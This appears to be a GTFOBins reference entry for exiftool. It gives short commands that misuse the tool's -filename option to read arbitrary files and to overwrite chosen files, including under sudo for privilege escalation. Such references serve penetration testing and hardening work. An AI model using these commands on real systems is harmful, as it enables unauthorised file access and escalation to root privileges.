GTFOBins.github.io/_gtfobins/exiftool.md

507 B

description functions
If the permissions allow it, files are moved (instead of copied) to the destination.
file-read file-write sudo
code
LFILE=file_to_read OUTPUT=output_file exiftool -filename=$OUTPUT $LFILE cat $OUTPUT
code
LFILE=file_to_write INPUT=input_file exiftool -filename=$LFILE $INPUT
code
LFILE=file_to_write INPUT=input_file sudo exiftool -filename=$LFILE $INPUT